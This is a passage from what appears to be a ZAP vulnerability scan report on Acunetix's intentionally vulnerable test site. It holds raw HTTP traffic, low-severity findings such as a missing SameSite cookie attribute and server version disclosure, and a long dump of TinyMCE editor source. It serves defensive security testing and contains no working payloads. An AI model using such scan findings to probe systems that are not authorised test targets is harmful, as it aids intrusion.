<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>Untitled Document</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a forum site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="http://www.acunetix.com/company/contact.htm"> offices</A> in Malta, US and the UK.<BR> </P> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 441 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 211 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /Default.asp? Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:26 GMT Content-Length: 134 |
| Response Body - size: 134 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/Default.asp?">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 447 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:26 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| Instances | 20 |
| Solution | |
| Reference | http://projects.webappsec.org/Fingerprinting |
| Tags |
OWASP_2021_A05
WSTG-v42-SESS-02 OWASP_2017_A06 |
| CWE Id | 200 |
| WASC Id | 45 |
| Plugin Id | 90027 |
|
Low |
Cookie without SameSite Attribute |
|---|---|
| Description |
A cookie has been set without the SameSite attribute, which means that the cookie can be sent as a result of a 'cross-site' request. The SameSite attribute is an effective counter measure to cross-site request forgery, cross-site script inclusion, and timing attacks.
|
| URL | http://testasp.vulnweb.com |
| Method | GET |
| Parameter | ASPSESSIONIDCQRDQBRC |
| Attack | |
| Evidence | Set-Cookie: ASPSESSIONIDCQRDQBRC |
| Request Header - size: 205 bytes. |
GET http://testasp.vulnweb.com HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:21 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>3/14/2022 7:22:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/ |
| Method | GET |
| Parameter | ASPSESSIONIDCQRDQBRC |
| Attack | |
| Evidence | Set-Cookie: ASPSESSIONIDCQRDQBRC |
| Request Header - size: 206 bytes. |
GET http://testasp.vulnweb.com/ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=NJGCKBOCAAGEAOFIEAFFCFAM; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:20 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>3/14/2022 7:22:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| Instances | 2 |
| Solution |
Ensure that the SameSite attribute is set to either 'lax' or ideally 'strict' for all cookies.
|
| Reference | https://tools.ietf.org/html/draft-ietf-httpbis-cookie-same-site |
| Tags |
OWASP_2021_A01
WSTG-v42-SESS-02 OWASP_2017_A05 |
| CWE Id | 1275 |
| WASC Id | 13 |
| Plugin Id | 10054 |
|
Low |
Dangerous JS Functions |
|---|---|
| Description |
A dangerous JS function seems to be in use that would leave the site vulnerable.
|
| URL | http://testasp.vulnweb.com/jscripts/tiny_mce/tiny_mce.js |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | eval |
| Request Header - size: 347 bytes. |
GET http://testasp.vulnweb.com/jscripts/tiny_mce/tiny_mce.js HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 263 bytes. |
HTTP/1.1 200 OK
Content-Type: application/javascript Last-Modified: Thu, 29 May 2008 12:11:36 GMT Accept-Ranges: bytes ETag: "7edd7d2485c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 132342 |
| Response Body - size: 132,342 bytes. |
/**
* $RCSfile: tiny_mce.js,v $ * $Revision: 1.301 $ * $Date: 2005/10/30 16:06:56 $ * * @author Moxiecode * @copyright Copyright � 2004, Moxiecode Systems AB, All rights reserved. */ function TinyMCE(){this.majorVersion="2";this.minorVersion="0RC4";this.releaseDate="2005-10-30";this.instances=new Array();this.stickyClassesLookup=new Array();this.windowArgs=new Array();this.loadedFiles=new Array();this.configs=new Array();this.currentConfig=0;this.eventHandlers=new Array();var ua=navigator.userAgent;this.isMSIE=(navigator.appName=="Microsoft Internet Explorer");this.isMSIE5=this.isMSIE&&(ua.indexOf('MSIE 5')!=-1);this.isMSIE5_0=this.isMSIE&&(ua.indexOf('MSIE 5.0')!=-1);this.isGecko=ua.indexOf('Gecko')!=-1;this.isGecko18=ua.indexOf('Gecko')!=-1&&ua.indexOf('rv:1.8')!=-1;this.isSafari=ua.indexOf('Safari')!=-1;this.isOpera=ua.indexOf('Opera')!=-1;this.isMac=ua.indexOf('Mac')!=-1;this.isNS7=ua.indexOf('Netscape/7')!=-1;this.isNS71=ua.indexOf('Netscape/7.1')!=-1;this.dialogCounter=0;if(this.isOpera){this.isMSIE=true;this.isGecko=false;this.isSafari=false;}this.idCounter=0;};TinyMCE.prototype.defParam=function(key,def_val){this.settings[key]=tinyMCE.getParam(key,def_val);};TinyMCE.prototype.init=function(settings){var theme;this.settings=settings;if(typeof(document.execCommand)=='undefined')return;if(!tinyMCE.baseURL){var elements=document.getElementsByTagName('script');for(var i=0;i<elements.length;i++){if(elements[i].src&&(elements[i].src.indexOf("tiny_mce.js")!=-1||elements[i].src.indexOf("tiny_mce_src.js")!=-1||elements[i].src.indexOf("tiny_mce_gzip.php")!=-1)){var src=elements[i].src;tinyMCE.srcMode=(src.indexOf('_src')!=-1)?'_src':'';src=src.substring(0,src.lastIndexOf('/'));tinyMCE.baseURL=src;break;}}}this.documentBasePath=document.location.href;if(this.documentBasePath.indexOf('?')!=-1)this.documentBasePath=this.documentBasePath.substring(0,this.documentBasePath.indexOf('?'));this.documentURL=this.documentBasePath;this.documentBasePath=this.documentBasePath.substring(0,this.documentBasePath.lastIndexOf('/'));if(tinyMCE.baseURL.indexOf('://')==-1&&tinyMCE.baseURL.charAt(0)!='/'){tinyMCE.baseURL=this.documentBasePath+"/"+tinyMCE.baseURL;}this.defParam("mode","none");this.defParam("theme","advanced");this.defParam("plugins","",true);this.defParam("language","en");this.defParam("docs_language",this.settings['language']);this.defParam("elements","");this.defParam("textarea_trigger","mce_editable");this.defParam("editor_selector","");this.defParam("editor_deselector","mceNoEditor");this.defParam("valid_elements","+a[id|style|rel|rev|charset|hreflang|dir|lang|tabindex|accesskey|type|name|href|target|title|class|onfocus|onblur|onclick|ondblclick|onmousedown|onmouseup|onmouseover|onmousemove|onmouseout|onkeypress|onkeydown|onkeyup],-strong/b[class|style],-em/i[class|style],-strike[class|style],-u[class|style],+p[style|dir|class|align],-ol[class|style],-ul[class|style],-li[class|style],br,img[id|dir|lang|longdesc|usemap|style|class|src|onmouseover|onmouseout|border=0|alt|title|hspace|vspace|width|height|align],-sub[style|class],-sup[style|class],-blockquote[dir|style],-table[border=0|cellspacing|cellpadding|width|height|class|align|summary|style|dir|id|lang|bgcolor|background|bordercolor],-tr[id|lang|dir|class|rowspan|width|height|align|valign|style|bgcolor|background|bordercolor],tbody[id|class],thead[id|class],tfoot[id|class],-td[id|lang|dir|class|colspan|rowspan|width|height|align|valign|style|bgcolor|background|bordercolor|scope],-th[id|lang|dir|class|colspan|rowspan|width|height|align|valign|style|scope],caption[id|lang|dir|class|style],-div[id|dir|class|align|style],-span[style|class|align],-pre[class|align|style],address[class|align|style],-h1[style|dir|class|align],-h2[style|dir|class|align],-h3[style|dir|class|align],-h4[style|dir|class|align],-h5[style|dir|class|align],-h6[style|dir|class|align],hr[class|style],font[face|size|style|id|class|dir|color]");this.defParam("extended_valid_elements","");this.defParam("invalid_elements","");this.defParam("encoding","");this.defParam("urlconverter_callback",tinyMCE.getParam("urlconvertor_callback","TinyMCE.prototype.convertURL"));this.defParam("save_callback","");this.defParam("debug",false);this.defParam("force_br_newlines",false);this.defParam("force_p_newlines",true);this.defParam("add_form_submit_trigger",true);this.defParam("relative_urls",true);this.defParam("remove_script_host",true);this.defParam("focus_alert",true);this.defParam("document_base_url",this.documentURL);this.defParam("visual",true);this.defParam("visual_table_class","mceVisualAid");this.defParam("setupcontent_callback","");this.defParam("fix_content_duplication",true);this.defParam("custom_undo_redo",true);this.defParam("custom_undo_redo_levels",-1);this.defParam("custom_undo_redo_keyboard_shortcuts",true);this.defParam("verify_css_classes",false);this.defParam("verify_html",true);this.defParam("apply_source_formatting",false);this.defParam("directionality","ltr");this.defParam("cleanup_on_startup",false);this.defParam("inline_styles",false);this.defParam("convert_newlines_to_brs",false);this.defParam("auto_reset_designmode",true);this.defParam("entities","160,nbsp,38,amp,34,quot,162,cent,8364,euro,163,pound,165,yen,169,copy,174,reg,8482,trade,8240,permil,181,micro,183,middot,8226,bull,8230,hellip,8242,prime,8243,Prime,167,sect,182,para,223,szlig,8249,lsaquo,8250,rsaquo,171,laquo,187,raquo,8216,lsquo,8217,rsquo,8220,ldquo,8221,rdquo,8218,sbquo,8222,bdquo,60,lt,62,gt,8804,le,8805,ge,8211,ndash,8212,mdash,175,macr,8254,oline,164,curren,166,brvbar,168,uml,161,iexcl,191,iquest,710,circ,732,tilde,176,deg,8722,minus,177,plusmn,247,divide,8260,frasl,215,times,185,sup1,178,sup2,179,sup3,188,frac14,189,frac12,190,frac34,402,fnof,8747,int,8721,sum,8734,infin,8730,radic,8764,sim,8773,cong,8776,asymp,8800,ne,8801,equiv,8712,isin,8713,notin,8715,ni,8719,prod,8743,and,8744,or,172,not,8745,cap,8746,cup,8706,part,8704,forall,8707,exist,8709,empty,8711,nabla,8727,lowast,8733,prop,8736,ang,180,acute,184,cedil,170,ordf,186,ordm,8224,dagger,8225,Dagger,192,Agrave,194,Acirc,195,Atilde,196,Auml,197,Aring,198,AElig,199,Ccedil,200,Egrave,202,Ecirc,203,Euml,204,Igrave,206,Icirc,207,Iuml,208,ETH,209,Ntilde,210,Ograve,212,Ocirc,213,Otilde,214,Ouml,216,Oslash,338,OElig,217,Ugrave,219,Ucirc,220,Uuml,376,Yuml,222,THORN,224,agrave,226,acirc,227,atilde,228,auml,229,aring,230,aelig,231,ccedil,232,egrave,234,ecirc,235,euml,236,igrave,238,icirc,239,iuml,240,eth,241,ntilde,242,ograve,244,ocirc,245,otilde,246,ouml,248,oslash,339,oelig,249,ugrave,251,ucirc,252,uuml,254,thorn,255,yuml,914,Beta,915,Gamma,916,Delta,917,Epsilon,918,Zeta,919,Eta,920,Theta,921,Iota,922,Kappa,923,Lambda,924,Mu,925,Nu,926,Xi,927,Omicron,928,Pi,929,Rho,931,Sigma,932,Tau,933,Upsilon,934,Phi,935,Chi,936,Psi,937,Omega,945,alpha,946,beta,947,gamma,948,delta,949,epsilon,950,zeta,951,eta,952,theta,953,iota,954,kappa,955,lambda,956,mu,957,nu,958,xi,959,omicron,960,pi,961,rho,962,sigmaf,963,sigma,964,tau,965,upsilon,966,phi,967,chi,968,psi,969,omega,8501,alefsym,982,piv,8476,real,977,thetasym,978,upsih,8472,weierp,8465,image,8592,larr,8593,uarr,8594,rarr,8595,darr,8596,harr,8629,crarr,8656,lArr,8657,uArr,8658,rArr,8659,dArr,8660,hArr,8756,there4,8834,sub,8835,sup,8836,nsub,8838,sube,8839,supe,8853,oplus,8855,otimes,8869,perp,8901,sdot,8968,lceil,8969,rceil,8970,lfloor,8971,rfloor,9001,lang,9002,rang,9674,loz,9824,spades,9827,clubs,9829,hearts,9830,diams,8194,ensp,8195,emsp,8201,thinsp,8204,zwnj,8205,zwj,8206,lrm,8207,rlm,173,shy,233,eacute,237,iacute,243,oacute,250,uacute,193,Aacute,225,aacute,201,Eacute,205,Iacute,211,Oacute,218,Uacute,221,Yacute,253,yacute");this.defParam("entity_encoding","named");this.defParam("cleanup_callback","");this.defParam("add_unload_trigger",true);this.defParam("ask",false);this.defParam("nowrap",false);this.defParam("auto_resize",false);this.defParam("auto_focus",false);this.defParam("cleanup",true);this.defParam("remove_linebreaks",true);this.defParam("button_tile_map",false);this.defParam("submit_patch",true);this.defParam("browsers","msie,safari,gecko,opera");this.defParam("dialog_type","window");this.defParam("accessibility_warnings",true);this.defParam("merge_styles_invalid_parents","");this.defParam("force_hex_style_colors",true);this.defParam("trim_span_elements",true);this.defParam("convert_fonts_to_spans",false);this.defParam("doctype",'<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">');this.defParam("font_size_classes",'');this.defParam("font_size_style_values",'xx-small,x-small,small,medium,large,x-large,xx-large');this.defParam("event_elements",'a,img');if(this.isMSIE&&this.settings['browsers'].indexOf('msie')==-1)return;if(this.isGecko&&this.settings['browsers'].indexOf('gecko')==-1)return;if(this.isSafari&&this.settings['browsers'].indexOf('safari')==-1)return;if(this.isOpera&&this.settings['browsers'].indexOf('opera')==-1)return;var baseHREF=tinyMCE.settings['document_base_url'];if(baseHREF.indexOf('?')!=-1)baseHREF=baseHREF.substring(0,baseHREF.indexOf('?'));this.settings['base_href']=baseHREF.substring(0,baseHREF.lastIndexOf('/'))+"/";theme=this.settings['theme'];this.blockRegExp=new RegExp("^(h[1-6]|p|div|address|pre|form|table|li|ol|ul|td|blockquote|center|dl|dir|fieldset|form|noscript|noframes|menu|isindex)$","i");this.posKeyCodes=new Array(13,45,36,35,33,34,37,38,39,40);this.uniqueURL='http://tinymce.moxiecode.cp/mce_temp_url';this.settings['theme_href']=tinyMCE.baseURL+"/themes/"+theme;if(!tinyMCE.isMSIE)this.settings['force_br_newlines']=false;if(tinyMCE.getParam("content_css",false)){var cssPath=tinyMCE.getParam("content_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['content_css']=this.documentBasePath+"/"+cssPath;else this.settings['content_css']=cssPath;}else this.settings['content_css']='';if(tinyMCE.getParam("popups_css",false)){var cssPath=tinyMCE.getParam("popups_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['popups_css']=this.documentBasePath+"/"+cssPath;else this.settings['popups_css']=cssPath;}else this.settings['popups_css']=tinyMCE.baseURL+"/themes/"+theme+"/css/editor_popup.css";if(tinyMCE.getParam("editor_css",false)){var cssPath=tinyMCE.getParam("editor_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['editor_css']=this.documentBasePath+"/"+cssPath;else this.settings['editor_css']=cssPath;}else this.settings['editor_css']=tinyMCE.baseURL+"/themes/"+theme+"/css/editor_ui.css";if(tinyMCE.settings['debug']){var msg="Debug: \n";msg+="baseURL: "+this.baseURL+"\n";msg+="documentBasePath: "+this.documentBasePath+"\n";msg+="content_css: "+this.settings['content_css']+"\n";msg+="popups_css: "+this.settings['popups_css']+"\n";msg+="editor_css: "+this.settings['editor_css']+"\n";alert(msg);}this._initCleanup();if(this.configs.length==0){if(this.isSafari&&this.getParam('safari_warning',true))alert("Safari support is very limited and should be considered experimental.\nSo there is no need to even submit bugreports on this early version.\nYou can disable this message by setting: safari_warning option to false");tinyMCE.addEvent(window,"load",TinyMCE.prototype.onLoad);if(tinyMCE.isMSIE){if(tinyMCE.settings['add_unload_trigger']){tinyMCE.addEvent(window,"unload",TinyMCE.prototype.unloadHandler);tinyMCE.addEvent(window.document,"beforeunload",TinyMCE.prototype.unloadHandler);}}else{if(tinyMCE.settings['add_unload_trigger'])tinyMCE.addEvent(window,"unload",function(){tinyMCE.triggerSave(true,true);});}}this.loadScript(tinyMCE.baseURL+'/themes/'+this.settings['theme']+'/editor_template'+tinyMCE.srcMode+'.js');this.loadScript(tinyMCE.baseURL+'/langs/'+this.settings['language']+'.js');this.loadCSS(this.settings['editor_css']);var themePlugins=tinyMCE.getParam('plugins','',true,',');if(this.settings['plugins']!=''){for(var i=0;i<themePlugins.length;i++)this.loadScript(tinyMCE.baseURL+'/plugins/'+themePlugins[i]+'/editor_plugin'+tinyMCE.srcMode+'.js');}settings['index']=this.configs.length;this.configs[this.configs.length]=settings;};TinyMCE.prototype.loadScript=function(url){for(var i=0;i<this.loadedFiles.length;i++){if(this.loadedFiles[i]==url)return;}document.write('<sc'+'ript language="javascript" type="text/javascript" src="'+url+'"></script>');this.loadedFiles[this.loadedFiles.length]=url;};TinyMCE.prototype.loadCSS=function(url){for(var i=0;i<this.loadedFiles.length;i++){if(this.loadedFiles[i]==url)return;}document.write('<link href="'+url+'" rel="stylesheet" type="text/css" />');this.loadedFiles[this.loadedFiles.length]=url;};TinyMCE.prototype.importCSS=function(doc,css_file){if(css_file=='')return;if(typeof(doc.createStyleSheet)=="undefined"){var 